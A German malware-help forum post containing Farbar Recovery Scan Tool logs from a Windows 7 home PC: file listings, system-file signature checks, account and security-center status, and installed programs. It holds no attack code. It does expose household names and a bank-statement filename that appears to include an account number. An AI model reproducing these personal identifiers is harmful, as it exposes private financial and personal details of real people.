2017-04-12 16:34 - 2017-01-18 17:35 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l2-1-0.dll
2017-04-12 16:34 - 2017-01-18 17:35 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-2-0.dll
2017-04-12 16:34 - 2016-03-24 00:40 - 03181568 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2017-04-12 16:34 - 2016-03-24 00:40 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\RdpGroupPolicyExtension.dll
2017-04-12 08:17 - 2017-04-12 08:17 - 00000000 ____D C:\Users\Markus\AppData\Local\{D4A906ED-765B-447B-A705-3E08C47BFCFB}
2017-04-09 20:05 - 2017-04-09 20:05 - 00000000 ____D C:\Users\Markus\AppData\Local\{B50273B7-1BC2-469A-A2F8-999971EB3260}
2017-03-31 22:16 - 2009-06-10 23:00 - 00000824 _____ C:\Windows\system32\Drivers\etc\hosts.20170331-221645.backup
2017-03-27 18:50 - 2017-03-27 18:50 - 00068111 _____ C:\Users\Markus\Downloads\1200.pdf
2017-03-26 20:33 - 2017-03-26 20:33 - 00028344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aspnet_counters.dll
2017-03-26 20:33 - 2017-03-26 20:33 - 00019104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcr110_clr0400.dll
2017-03-26 20:33 - 2017-03-26 20:33 - 00019104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcr100_clr0400.dll
2017-03-26 20:33 - 2017-03-26 20:33 - 00019104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcp110_clr0400.dll
2017-03-26 20:29 - 2017-03-26 20:29 - 00030400 _____ (Microsoft Corporation) C:\Windows\system32\aspnet_counters.dll
2017-03-26 20:29 - 2017-03-26 20:29 - 00019112 _____ (Microsoft Corporation) C:\Windows\system32\msvcr110_clr0400.dll
2017-03-26 20:29 - 2017-03-26 20:29 - 00019112 _____ (Microsoft Corporation) C:\Windows\system32\msvcr100_clr0400.dll
2017-03-26 20:29 - 2017-03-26 20:29 - 00019112 _____ (Microsoft Corporation) C:\Windows\system32\msvcp110_clr0400.dll
2017-03-26 18:33 - 2017-03-26 18:33 - 00095872 _____ C:\Users\Markus\Downloads\1304.pdf
2017-03-25 16:41 - 2017-03-25 16:41 - 00328085 _____ C:\Users\Markus\Desktop\Golf.pdf
2017-03-23 20:45 - 2017-03-23 20:45 - 00000000 ____D C:\Users\Markus\AppData\Local\{4F8BC0E6-2FFE-429E-B22E-1C8A483C3292}
2017-03-17 17:54 - 2017-03-18 09:14 - 00000000 ____D C:\Users\Markus\AppData\Local\{52B32EC6-011A-4DA3-9288-E8E60139E12E}
2017-03-14 19:57 - 2017-02-10 18:32 - 00803328 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll
2017-03-14 19:57 - 2017-02-10 18:17 - 00628736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usp10.dll
2017-03-14 19:57 - 2017-02-10 16:33 - 01251328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2017-03-14 19:57 - 2017-02-09 18:32 - 00040960 _____ (Microsoft Corporation) C:\Windows\system32\WcsPlugInService.dll
2017-03-14 19:57 - 2017-02-09 18:31 - 00625664 _____ (Microsoft Corporation) C:\Windows\system32\mscms.dll
2017-03-14 19:57 - 2017-02-09 18:31 - 00250880 _____ (Microsoft Corporation) C:\Windows\system32\icm32.dll
2017-03-14 19:57 - 2017-02-09 18:14 - 00481792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscms.dll
2017-03-14 19:57 - 2017-02-09 18:14 - 00215040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icm32.dll
2017-03-14 19:57 - 2017-02-09 17:51 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WcsPlugInService.dll
2017-03-14 19:57 - 2017-02-09 16:06 - 01648128 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2017-03-14 19:57 - 2017-02-09 16:06 - 01180160 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2017-03-14 19:57 - 2017-02-06 18:14 - 00733696 _____ (Microsoft Corporation) C:\Windows\HelpPane.exe
2017-03-14 19:57 - 2017-01-13 20:00 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2017-03-14 19:57 - 2017-01-13 20:00 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2017-03-14 19:57 - 2017-01-13 19:45 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2017-03-14 19:57 - 2017-01-13 19:45 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll
2017-03-14 19:57 - 2017-01-11 20:01 - 01887744 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2017-03-14 19:57 - 2017-01-11 20:01 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll
2017-03-14 19:57 - 2017-01-11 19:43 - 01241088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2017-03-14 19:57 - 2017-01-11 19:43 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3r.dll
2017-03-14 19:53 - 2017-02-23 01:42 - 00084712 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2017-03-14 19:53 - 2017-02-23 01:37 - 01285632 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2017-03-14 19:53 - 2017-02-18 16:05 - 01609216 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2017-03-14 19:53 - 2017-02-18 16:05 - 00646656 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2017-03-14 19:53 - 2016-12-31 17:36 - 00556544 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2017-03-14 19:53 - 2016-12-31 17:36 - 00335360 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2017-03-14 19:53 - 2016-12-31 17:36 - 00293376 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2017-03-14 19:53 - 2016-12-31 17:36 - 00233984 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2017-03-14 19:53 - 2016-12-31 17:36 - 00133632 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2017-03-12 15:32 - 2017-03-12 15:32 - 00000000 ____D C:\Users\Markus\AppData\Local\{2A10B088-5F9A-4B5E-8793-443B44E56A0C}
2017-03-11 19:36 - 2017-03-11 19:36 - 00000000 ____D C:\Users\Markus\AppData\Local\{D27D4A87-0302-45BB-8868-C245DE0E6486}
2017-03-10 20:46 - 2017-03-10 20:46 - 00000000 ____D C:\Users\Markus\AppData\Local\{1717CB09-9F15-425E-B2AD-B2051CF57FEC}
2017-03-07 20:35 - 2017-03-07 20:35 - 00049874 _____ C:\Users\Markus\Downloads\Kontoauszug_693570094300_2017-03-01_0318.pdf
2017-03-05 20:36 - 2017-03-05 20:36 - 00000000 ____D C:\Users\Markus\AppData\Local\{AF5D0A94-E422-459E-8657-667717A1D8CF}
2017-02-28 19:51 - 2017-02-28 19:51 - 00000000 ____D C:\Users\Markus\AppData\Local\{BC14EC85-5A89-4637-8B1B-108A4ED977C2}
2017-02-26 14:56 - 2017-02-26 14:56 - 01892096 _____ C:\Users\Markus\Desktop\Bushnell.pdf

==================== Drei Monate: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-05-22 20:55 - 2012-12-09 23:31 - 00000000 ____D C:\Users\Markus\Documents\Outlook-Dateien
2017-05-22 20:54 - 2012-11-14 15:17 - 00000000 ____D C:\Users\Markus\AppData\Roaming\Skype
2017-05-22 20:54 - 2012-11-07 06:17 - 00000000 ____D C:\ProgramData\NVIDIA
2017-05-22 20:54 - 2009-07-14 07:08 - 00032632 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2017-05-22 20:45 - 2009-07-14 06:45 - 00031536 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-05-22 20:45 - 2009-07-14 06:45 - 00031536 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-05-22 20:43 - 2012-01-06 19:54 - 00699666 _____ C:\Windows\system32\perfh007.dat
2017-05-22 20:43 - 2012-01-06 19:54 - 00149774 _____ C:\Windows\system32\perfc007.dat
2017-05-22 20:43 - 2009-07-14 07:13 - 01620612 _____ C:\Windows\system32\PerfStringBackup.INI
2017-05-22 20:43 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\inf
2017-05-22 06:47 - 2012-11-18 20:44 - 00000000 ____D C:\Users\Markus\Word
2017-05-21 14:35 - 2012-11-07 10:08 - 00000000 ____D C:\Users\Markus
2017-05-21 14:34 - 2015-01-18 20:27 - 00000000 ____D C:\Users\Alina
2017-05-21 14:33 - 2015-06-29 19:27 - 00000000 ____D C:\Users\Markus\Kontoauszuege
2017-05-21 08:53 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\LiveKernelReports
2017-05-20 18:56 - 2016-02-03 21:30 - 00000461 _____ C:\Users\Markus\Desktop\Smart Camera.ini
2017-05-20 17:26 - 2012-12-17 23:10 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2017-05-20 11:55 - 2013-12-01 12:45 - 00000000 ____D C:\Program Files\Avira Secure Backup
2017-05-19 16:57 - 2014-02-03 20:32 - 00000000 ____D C:\ProgramData\Package Cache
2017-05-19 16:56 - 2013-12-01 12:45 - 00000000 ____D C:\Users\Markus\AppData\Roaming\Avira
2017-05-19 16:33 - 2015-09-01 07:04 - 00000000 ____D C:\Program Files\Common Files\AV
2017-05-17 21:15 - 2012-12-25 12:58 - 00000000 ____D C:\Users\Markus\AppData\Local\CrashDumps
2017-05-17 14:33 - 2013-08-04 21:34 - 00000000 ____D C:\Windows\system32\appmgmt
2017-05-17 09:19 - 2013-04-06 17:26 - 00000000 ____D C:\Users\Markus\AppData\Local\FreePDF_XP
2017-05-13 19:31 - 2012-11-08 21:56 - 00803320 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-05-13 19:31 - 2012-11-08 21:56 - 00144888 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-05-13 19:31 - 2012-11-08 21:56 - 00004366 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-05-13 19:31 - 2012-11-08 21:55 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2017-05-13 19:31 - 2012-11-08 21:55 - 00000000 ____D C:\Windows\system32\Macromed
2017-05-13 11:56 - 2013-01-12 19:05 - 00000000 ____D C:\Users\Markus\AppData\Local\ElevatedDiagnostics
2017-05-13 11:56 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\system32\NDF
2017-05-12 19:33 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\rescache
2017-05-12 17:55 - 2009-07-14 06:45 - 00423960 _____ C:\Windows\system32\FNTCACHE.DAT
2017-05-12 17:54 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\PolicyDefinitions
2017-05-12 17:37 - 2012-01-26 23:54 - 01594892 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2017-05-12 17:35 - 2013-08-15 22:57 - 00000000 ____D C:\Windows\system32\MRT
2017-05-12 17:35 - 2012-11-11 18:05 - 156335152 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2017-05-08 21:06 - 2014-12-26 19:13 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2017-05-07 09:39 - 2012-11-07 10:10 - 00000000 ____D C:\Windows\System32\Tasks\Fujitsu
2017-05-02 20:05 - 2015-09-13 10:32 - 00000000 ____D C:\Users\Alina\Kontoauszug
2017-05-02 20:01 - 2015-10-01 18:25 - 00000000 ____D C:\Users\Paul\Kontoauszuege
2017-05-02 20:01 - 2015-10-01 18:25 - 00000000 ____D C:\Users\Paul
2017-05-01 19:59 - 2013-09-29 11:20 - 00000000 ____D C:\Program Files\PDFCreator
2017-05-01 19:58 - 2012-12-14 22:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexware
2017-05-01 17:52 - 2016-03-03 14:22 - 00000000 ____D C:\Users\Markus\AppData\Roaming\Mp3tag
2017-05-01 17:40 - 2013-09-03 19:51 - 01567232 ___SH C:\Users\Markus\Downloads\Thumbs.db
2017-05-01 09:33 - 2012-11-18 20:43 - 00000000 ____D C:\Users\Markus\Haus
2017-04-30 18:00 - 2013-10-29 15:43 - 00000000 ____D C:\Users\Markus\AppData\Local\CUSTPDF Writer
2017-04-30 18:00 - 2012-11-18 20:43 - 00000000 ____D C:\Users\Markus\Power Point
2017-04-29 17:18 - 2012-11-07 10:08 - 00003542 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2017-04-29 17:18 - 2012-11-07 10:08 - 00003414 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2017-04-27 19:19 - 2012-11-08 15:03 - 00000000 ____D C:\Users\Markus\AppData\Local\Google
2017-04-23 16:36 - 2014-09-28 19:14 - 00011142 _____ C:\Users\Alina\Alina3.xlsx
2017-04-22 19:57 - 2012-11-18 20:43 - 00000000 ____D C:\Users\Markus\Papiere
2017-04-22 10:20 - 2017-01-15 16:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Solveig Multimedia
2017-04-22 10:20 - 2017-01-15 16:09 - 00000000 ____D C:\Program Files (x86)\Solveig Multimedia
2017-04-22 10:06 - 2012-11-18 20:43 - 00000000 ____D C:\Users\Markus\Kaufen und Bestellen

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2013-09-29 12:20 - 2013-12-01 11:20 - 0000093 _____ () C:\Users\Markus\AppData\Roaming\WB.CFG
2013-09-29 12:20 - 2013-12-01 11:20 - 0000006 _____ () C:\Users\Markus\AppData\Roaming\WBPU-TTL.DAT
2012-11-27 22:00 - 2012-11-27 22:00 - 0003584 _____ () C:\Users\Markus\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2016-01-30 21:00 - 2016-01-30 21:00 - 0003339 _____ () C:\Users\Markus\AppData\Local\recently-used.xbel
2013-04-06 17:15 - 2013-04-06 17:15 - 0000057 _____ () C:\ProgramData\Ament.ini

Einige Dateien in TEMP:
====================
2017-05-20 20:59 - 2017-05-20 21:00 - 57906656 _____ (Skype Technologies S.A.) C:\Users\Markus\AppData\Local\Temp\SkypeSetup.exe

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-05-13 09:10

==================== Ende von FRST.txt ============================

--- --- ---

[/CODE]

MBJPaul · 22.05.2017, 20:09

Addition:

FRST Additions Logfile:

Code:

ATTFilter

Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 22-05-2017
durchgeführt von Markus (22-05-2017 20:57:43)
Gestartet von C:\FRST\FRST-OlderVersion
Windows 7 Professional Service Pack 1 (X64) (2012-11-07 08:08:14)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-3526156030-524322557-4044303751-500 - Administrator - Disabled)
Gast (S-1-5-21-3526156030-524322557-4044303751-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3526156030-524322557-4044303751-1003 - Limited - Enabled)
Markus (S-1-5-21-3526156030-524322557-4044303751-1001 - Administrator - Enabled) => C:\Users\Markus

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

64 Bit HP CIO Components Installer (Version: 8.2.4 - Hewlett-Packard) Hidden
AAVUpdateManager (HKLM-x32\...\{AFA42FE1-A5C3-485F-9180-BFCF5BF1F1C3}) (Version: 18.00.0000 - Wolters Kluwer Deutschland GmbH)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
Adobe Flash Player 25 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 25.0.0.171 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated)
CANON iMAGE GATEWAY MyCamera Download Plugin (HKLM-x32\...\MyCamera Download Plugin) (Version: 3.1.0.1 - Canon Inc.)
CANON iMAGE GATEWAY Task for ZoomBrowser EX (HKLM-x32\...\CANON iMAGE GATEWAY Task) (Version: 1.8.0.1 - Canon Inc.)
Canon Internet Library for ZoomBrowser EX (HKLM-x32\...\Canon Internet Library for ZoomBrowser EX) (Version: 1.7.0.1 - Canon Inc.)
Canon MOV Decoder (HKLM-x32\...\Canon MOV Decoder) (Version: 1.7.0.6 - Canon Inc.)
Canon MOV Encoder (HKLM-x32\...\Canon MOV Encoder) (Version: 1.5.0.3 - Canon Inc.)
Canon MovieEdit Task for ZoomBrowser EX (HKLM-x32\...\MovieEditTask) (Version: 3.6.0.5 - Canon Inc.)
Canon RAW Codec (HKLM-x32\...\Canon RAW Codec) (Version: 1.8.0.68 - Canon Inc.)
Canon Utilities Digital Photo Professional 3.9 (HKLM-x32\...\DPP) (Version: 3.9.1.0 - Canon Inc.)
Canon Utilities EOS Utility (HKLM-x32\...\EOS Utility) (Version: 2.9.0.0 - Canon Inc.)
Canon Utilities PhotoStitch (HKLM-x32\...\PhotoStitch) (Version: 3.1.22.46 - Canon Inc.)
Canon Utilities Picture Style Editor (HKLM-x32\...\Picture Style Editor) (Version: 1.8.0.0 - Canon Inc.)
Canon Utilities WFT Utility (HKLM-x32\...\WFTK) (Version: 3.5.1.1 - Canon Inc.)
Canon Utilities ZoomBrowser EX (HKLM-x32\...\ZoomBrowser EX) (Version: 6.6.0.23 - Canon Inc.)
Canon ZoomBrowser EX Memory Card Utility (HKLM-x32\...\ZoomBrowser EX Memory Card Utility) (Version: 1.4.0.4 - Canon Inc.)
Control ActiveX de Windows Live Mesh para conexiones remotas (HKLM-x32\...\{04668DF2-D32F-4555-9C7E-35523DCD6544}) (Version: 15.4.5722.2 - Microsoft Corporation)
Contrôle ActiveX Windows Live Mesh pour connexions à distance (HKLM-x32\...\{55D003F4-9599-44BF-BA9E-95D060730DD3}) (Version: 15.4.5722.2 - Microsoft Corporation)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
EDEKA Foto (HKLM-x32\...\EDEKA Foto) (Version: 5.1.6 - CEWE Stiftung u Co. KGaA)
FJ Camera (HKLM-x32\...\{399C37FB-08AF-493B-BFED-20FBD85EDF7F}) (Version: 5.8.52032.0_WHQL - Sonix)
FreePDF (Remove only) (HKLM-x32\...\FreePDF_XP) (Version:  - )
Fujitsu Hotkey Utility (HKLM-x32\...\InstallShield_{C8E4B31D-337C-483D-822D-16F11441669B}) (Version: 3.70.0.0 - FUJITSU LIMITED)
Fujitsu Hotkey Utility (x32 Version: 3.70.0.0 - FUJITSU LIMITED) Hidden
Fujitsu MobilityCenter Extension Utility (HKLM-x32\...\InstallShield_{EC314CDF-3521-482B-A21C-65AC95664814}) (Version: 3.01.00.002 - FUJITSU LIMITED)
Fujitsu MobilityCenter Extension Utility (Version: 3.01.00.002 - FUJITSU LIMITED) Hidden
Fujitsu System Extension Utility (HKLM-x32\...\InstallShield_{E8A5B78F-4456-4511-AB3D-E7BFFB974A7A}) (Version: 3.4.4.0 - FUJITSU LIMITED)
Fujitsu System Extension Utility (Version: 3.4.4.0 - FUJITSU LIMITED) Hidden
Galería fotográfica de Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Galerie de photos Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Google Earth (HKLM-x32\...\{F6430171-B86B-4639-839E-374913E7911D}) (Version: 7.1.8.3036 - Google)
Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden
GPL Ghostscript (HKLM-x32\...\GPL Ghostscript 9.04) (Version: 9.04 - Artifex Software Inc.)
High-Definition Video Playback (x32 Version: 7.1.13900.47.0 - Nero AG) Hidden
HP FWUpdateEDO2 (HKLM-x32\...\{415FA9AD-DA10-4ABE-97B6-5051D4795C90}) (Version: 1.2.0.0 - Hewlett-Packard)
HP LaserJet 200 color MFP M276 (HKLM-x32\...\{CC38C23C-7824-4DBB-AC73-997CD0BBFEC7}) (Version: 5.0.12201.1116 - Hewlett-Packard)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.9572 - HP)
hpbDSService (x32 Version: 002.002.07399 - Hewlett-Packard) Hidden
hpbM276DSService (x32 Version: 001.001.05874 - Hewlett-Packard) Hidden
HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden
HPDXP (x32 Version: 3.0.26.8 - HP) Hidden
HPLaserJet200color-MFPM276_HelpLearnCenter_SI (HKLM-x32\...\{0F044C7A-6EE1-4F03-90AC-329AAF2FCF12}) (Version: 1.01.0000 - Hewlett-Packard)
HPLJDXPHelper (x32 Version: 020.021.004 - HP) Hidden
HPLJUTCore (x32 Version: 004.005.0001 - HP) Hidden
HPLJUTM276 (x32 Version: 3.00.0003 - HP) Hidden
hppFaxDrvM276 (x32 Version: 003.000.00002 - Hewlett-Packard) Hidden
hppLaserJetService (x32 Version: 009.027.00856 - Hewlett-Packard) Hidden
hppM276LaserJetService (x32 Version: 001.019.00639 - Hewlett-Packard) Hidden
hppSendFaxM276 (x32 Version: 003.000.00002 - Hewlett-Packard) Hidden
hpStatusAlerts (x32 Version: 050.037.00142 - Hewlett Packard) Hidden
hpStatusAlertsM276 (x32 Version: 050.034.00131 - Hewlett-Packard) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.0.0.1351 - Intel Corporation)
Intel(R) OpenCL CPU Runtime (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version:  - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2626 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.3.214 - Intel Corporation)
Intel® PROSet/Wireless WiFi Software (HKLM\...\{DF7756DD-656A-45C3-BA71-74673E8259A9}) (Version: 15.00.0000.0642 - Intel Corporation)
Intel® Trusted Connect Service Client (HKLM\...\{6199B534-A1B6-46ED-873B-97B0ECF8F81E}) (Version: 1.23.216.0 - Intel Corporation)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Lexware buchhalter 2014 (x32 Version: 19.02.00.0181 - Haufe-Lexware GmbH & Co.KG) Hidden
Lexware online banking (x32 Version: 20.00.00.0059 - Haufe-Lexware GmbH Co.KG) Hidden
LIFEBOOK Application Panel (HKLM-x32\...\InstallShield_{6226477E-444F-4DFE-BA19-9F4F7D4565BC}) (Version: 8.3.2.0 - FUJITSU LIMITED)
LIFEBOOK Application Panel (Version: 8.3.2.0 - FUJITSU LIMITED) Hidden
LJDXPHelperUI (x32 Version: 020.021.004 - HP) Hidden
Malwarebytes Version 3.1.2.1733 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.1.2.1733 - Malwarebytes)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.6.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUSR) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2012 Express LocalDB  (HKLM\...\{E4A1FDA3-689D-44DA-9B39-86BD2270F522}) (Version: 11.2.5058.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Management Objects  (x64) (HKLM\...\{43A5C316-9521-49C3-B9B6-FCE5E1005DF0}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2012 (x64) (HKLM\...\{99AC7F47-A4E0-4706-9C65-8948775C2652}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{6AFCA4E1-9B78-3640-8F72-A7BF33448200}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{90ffcee5-8608-4e94-8c18-a4feb4f83fb8}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{4fcf070a-daac-45e9-a8b0-6850941f7ed8}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio 2010-Tools für Office-Laufzeit (x64) Language Pack - DEU (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - DEU) (Version: 10.0.50903 - Microsoft Corporation)
